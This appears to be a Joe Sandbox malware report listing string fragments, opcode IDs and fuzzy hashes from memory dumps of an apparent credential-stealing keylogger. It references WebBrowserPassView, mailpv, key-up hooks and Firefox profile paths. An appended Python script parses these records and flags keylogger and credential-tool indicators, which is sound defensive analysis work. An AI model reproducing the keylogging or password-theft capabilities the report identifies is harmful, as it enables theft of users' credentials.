                                                                      • Source File: 00000008.00000002.311863165.0000000000CA2000.00000040.00000001.sdmp, Offset: 00CA2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 111$186$IT2$This is an email notifying you that $ctrl]$irefox\Profiles$ogger$owsUpdate.exe$tRegistry.blob
                                                                      • API String ID: 0-2878782224
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$Version$atform$broswers$d$geType$sion
                                                                      • API String ID: 0-3555804936
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MainForm$deAttribute$downMode$nExit$oughAttribute$t_MainForm$utdownStyle
                                                                      • API String ID: 0-2660833595
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Configuration$etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-749029414
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _SaveMySettingsOnExit$cLockOnValueType$cretKey$efault$ettingsBase$tart
                                                                      • API String ID: 0-21323432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __aulldvrm$__aullrem
                                                                      • String ID: +
                                                                      • API String ID: 643879872-2126386893
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Install$ValueKind$alogResult$ectoryInfo$nput
                                                                      • API String ID: 0-1121157722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-1272195059
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-1272195059
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: W?>$WM_KEYUP$YSKEYDOWN$rdHandle$tCheckedForegroundTitle
• API String ID: 0-1626258673
• Opcode ID: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
• Instruction ID: 82ad83976ee985ed02c23c17c2e617a6a848d2e4f05bc5c05883554c31e76abd
• Opcode Fuzzy Hash: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
• Instruction Fuzzy Hash: 883133B6401715BEDB20A6668C86EFF737CEF80714F10419FF114A22C2D7796D819716
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: blecmd$blespreaders$lers$onfig
• API String ID: 0-481515171
• Opcode ID: 0081d5c7f54b3d98f68d98c44ef9de1f41ae34dfb7a9c3a776c16707995f7a76
• Instruction ID: 6402ad81fb6b09abb2f1c861852fb12422070b99dcffa0eb0a2dbc2aadf66f39
• Opcode Fuzzy Hash: 0081d5c7f54b3d98f68d98c44ef9de1f41ae34dfb7a9c3a776c16707995f7a76
• Instruction Fuzzy Hash: 6FF15C719083419FD724DF15C480A1BB7E1BF98314F14893EF985AB7A2D778E849CB8A
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: ($eplace$nput$ssCollection
• API String ID: 0-3968101734
• Opcode ID: d755f27a03abb9c19fb199d35ae9f5dbe1cc2d2f2486be66b19254a0a7a9c303
• Instruction ID: fcb97479f6c5ee1e9a2d3fd182630dc95d510c4f748e9e3d89775aed82ad15a9
• Opcode Fuzzy Hash: d755f27a03abb9c19fb199d35ae9f5dbe1cc2d2f2486be66b19254a0a7a9c303
• Instruction Fuzzy Hash: 18B13571E00268CFDB25DF69C880BADB7B1AF48310F1585EAE50DAB251D734AE85CF61
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: [ralt] $"$]----$cretKey
• API String ID: 0-821508316
• Opcode ID: 7239851b87b73b2b576e4bdc9ed1d759d6a3dc0bf60bd135c0ac29f64485b5cd
• Instruction ID: 79fceb5a15ab96600d75acf66726443de40a04c91b4a8acb970fd3e9e3ca5a36
• Opcode Fuzzy Hash: 7239851b87b73b2b576e4bdc9ed1d759d6a3dc0bf60bd135c0ac29f64485b5cd
• Instruction Fuzzy Hash: D4817C709042499FDF10DF95C9819EEBBB1EF08318F20816AE944AB382D778EDC1CB59
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: alogResult$eplace$nput$ssCollection
• API String ID: 0-1282157775
• Opcode ID: fcdbbed227913cea6e670874191b59cf7525f3a5d5ea891bbf393e993d717771
• Instruction ID: 65ceef295a2406448e14adf3304f50eaada4ed9c5c614e733cbf015694502e13
• Opcode Fuzzy Hash: fcdbbed227913cea6e670874191b59cf7525f3a5d5ea891bbf393e993d717771
• Instruction Fuzzy Hash: FA814A72D00269DFDF26DF54C881BA9BBB0AF04314F1580DAE908BB252D774AA84CF61
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: E@$E@$alogResult$stealers
• API String ID: 0-676929206
• Opcode ID: 716a136052da102a409e342fd1c3c6b937cf1be9b708008c5029184d985e8f10
• Instruction ID: a3db400f85aeb70d3d7dceeecf2484641178af7c7eb0baca3baf059bb90a8548
• Opcode Fuzzy Hash: 716a136052da102a409e342fd1c3c6b937cf1be9b708008c5029184d985e8f10
• Instruction Fuzzy Hash: 5251B171A00245EFCB15CF6AC880AAEB7B5AF85310F20446BE411EB3D2E738E912CB55
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: alogResult$eplace$nput$ssCollection
• API String ID: 0-1282157775
• Opcode ID: 48af60b81afe077e89717de1585323a7bb45d78e9ade54197e1b75c028f723db
• Instruction ID: 832c5015c8b46af1365979640141732d0ecaf7cb3f0835352f5ace0868dddf7b
• Opcode Fuzzy Hash: 48af60b81afe077e89717de1585323a7bb45d78e9ade54197e1b75c028f723db
• Instruction Fuzzy Hash: 84517075900218EFDB22DF98C881BACBBB1EF44310F258496EA09BB251D775EE85CF51
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: back$groundTitle$onment$tem.IO
• API String ID: 0-3494574869
• Opcode ID: 9a5e19d82dd8fecb769b2109d35e635458a9c8e25781593e7062ead4ef09843a
• Instruction ID: 68362988bef36b44b354e8d21e58007a30a11c1ded230cd605da3781e219b713
• Opcode Fuzzy Hash: 9a5e19d82dd8fecb769b2109d35e635458a9c8e25781593e7062ead4ef09843a
• Instruction Fuzzy Hash: B941A4B194125DAAEB20EB55CC45FFB737CFF45300F0401EAB909A2291E7359B948F66
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: bute$can only be set to Nothing$tart$yAttribute
• API String ID: 0-3363723335
• Opcode ID: 7922f3ac3d11ac309c69a3cccb0bcf600ae82b13959e5ac31e31877597629905
• Instruction ID: 3e7e7deb81854117757ce4072510090786ed4db560648b3831a3de1b255960e7
• Opcode Fuzzy Hash: 7922f3ac3d11ac309c69a3cccb0bcf600ae82b13959e5ac31e31877597629905
• Instruction Fuzzy Hash: 15319031A04214BFDF11AFA58C42A6E7BA5DF44364B1400BAFC04B7392E779BD509B9A
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: ableSSL$ocker$rror$websitevisitor
• API String ID: 0-2711359268
• Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
• Instruction ID: fdcc71baa2c1898a34b417db1a72cc4b5b6a58a4956308bdae5f86da85e711d6
• Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
• Instruction Fuzzy Hash: A901D655E94AF1A1FA3320074C42FB616589BA3B14FB54B27BB45305C0A19F2D86539F
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: broswers$hain$sion$ssage
• API String ID: 0-533874572
• Opcode ID: 1a9e1ef1dc770ded04876e966bdc7d5da9b0f7fca2beb3cbcad6bbb8c78e8139
• Instruction ID: 96d0ecbdaac24cd4865d4fd82dce6607e3fdf6c36f9fb55bf83c8aadf7e7fd8b
• Opcode Fuzzy Hash: 1a9e1ef1dc770ded04876e966bdc7d5da9b0f7fca2beb3cbcad6bbb8c78e8139
• Instruction Fuzzy Hash: BAF0F431604708BFFB211D659C01BA7B6A8EB40365F104537FC04E6281E779C8648AA9
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp
• Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID:
• String ID: GetTypeFromHandle$ainsKey$idOperationException$ntimeTypeHandle
• API String ID: 0-1766265863
• Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
• Instruction ID: 44706222da7b7531220037572efdf130db1f87326ad9f4a125fafc4dbee6b1e5
• Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
• Instruction Fuzzy Hash: 69F03478984704AEDB30AF75DC08E07BEF0EFA8B11721892EE0C593650D779A401EF54
Uniqueness

Uniqueness Score: -1.00%
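The function records above all share one layout: a memory-dump source (here the image mapped at 003D0000 in process 8, backed by a PE), the truncated tails of the strings each function references, and an opcode/instruction hash pair. Reading them by hand is slow, and the records that matter for triage are the ones whose string tails point at the keylogger path (WM_KEYUP, the tail of WM_SYSKEYDOWN, the foreground-title check) and at the bundled NirSoft recovery tools (mailpv, the tail of WebBrowserPassView, an in-memory execute helper). The script below is an added example, not code from the sandbox report, from Joe Sandbox or from the analysed sample: it parses records in this layout and groups functions by the indicator tails they reference. The two input records are copied from the report above; the grouping of tails into "keylogger" and "credential_tool" buckets, and the reading of the dump name's first dotted field as the sandbox process index, are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function 'Similarity' records and flag indicator strings.
Added example, not code from the sandbox report or from the analysed sample; the
records in SAMPLE_REPORT are copied from the report, the grouping is an assumption."""
import re
from collections import defaultdict

# Constructed input: two function records copied from the report above.
SAMPLE_REPORT = """\
Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
Yara matches
Similarity
• API ID:
• String ID: etObject$mailpv$moryExecute$owserPassView$tingsBase
• API String ID: 0-1272195059
• Opcode ID: 2da5678ef2efda63e6d04daa6b72e154f486a5efa12a1df60f83ed46eeb138ac
• Instruction ID: 23775b57c5181a705fd841c27966cf022b6c2ad29db91b8595daa32edbf3a325
• Opcode Fuzzy Hash: 2da5678ef2efda63e6d04daa6b72e154f486a5efa12a1df60f83ed46eeb138ac
• Instruction Fuzzy Hash: F561BF31A00215AFDB15DF69C840BAEBBB5FF44314F16819AE855AB391CB38EE40CB95
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: W?>$WM_KEYUP$YSKEYDOWN$rdHandle$tCheckedForegroundTitle
• API String ID: 0-1626258673
• Opcode ID: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
• Instruction ID: 82ad83976ee985ed02c23c17c2e617a6a848d2e4f05bc5c05883554c31e76abd
• Opcode Fuzzy Hash: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
• Instruction Fuzzy Hash: 883133B6401715BEDB20A6668C86EFF737CEF80714F10419FF114A22C2D7796D819716
Uniqueness

Uniqueness Score: -1.00%
"""

# The report lists truncated tails of the referenced strings ("YSKEYDOWN" for
# WM_SYSKEYDOWN), so matching is on those tails. The grouping is an assumption.
INDICATORS = {
    "keylogger": {"WM_KEYUP", "YSKEYDOWN", "tCheckedForegroundTitle"},
    "credential_tool": {"mailpv", "owserPassView", "moryExecute"},
}

FIELD_RE = re.compile(r"^•?\s*([^:]+):\s*(.*)$")  # "• Key: value" or "Key: value"
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


def parse_records(text):
    """Split report text into one dict per function record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":  # each record opens with this tab label
            cur = {"associated": [], "strings": []}
            records.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if not m:
            continue  # tab labels ("Yara matches", "Similarity") and blanks
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            cur["source_file"] = s["file"]
            cur["offset"] = int(s["offset"], 16)
            cur["pe_backed"] = s["pe"] == "true"
            # Assumption: the dump name's first dotted field is the sandbox process index.
            cur["process"] = int(s["file"].split(".")[0])
        elif key == "Associated":  # drop the web page's link label if present
            cur["associated"].append(value.removesuffix(" Download File"))
        elif key == "String ID":  # '$'-joined fragments; drop empties
            cur["strings"] = [t for t in value.split("$") if t]
        else:
            cur[key.lower().replace(" ", "_")] = value
    return records


def classify(record):
    """Indicator groups whose fragments occur in the record's string list."""
    present = set(record["strings"])
    return sorted(g for g, frags in INDICATORS.items() if present & frags)


def summarize(text):
    """Map each indicator group to the Opcode IDs of the functions carrying it."""
    hits = defaultdict(list)
    for rec in parse_records(text):
        for group in classify(rec):
            hits[group].append(rec["opcode_id"])
    return dict(hits)
```

Run `summarize()` over the full function listing to get, per indicator group, the Opcode IDs of the functions to open first; the Instruction Fuzzy Hash on each record is what you would then carry into a similarity search against other samples of the same family. The tail-matching is deliberately exact rather than substring-based, because the tails are short and a substring match on something like "lers" would hit unrelated .NET metadata.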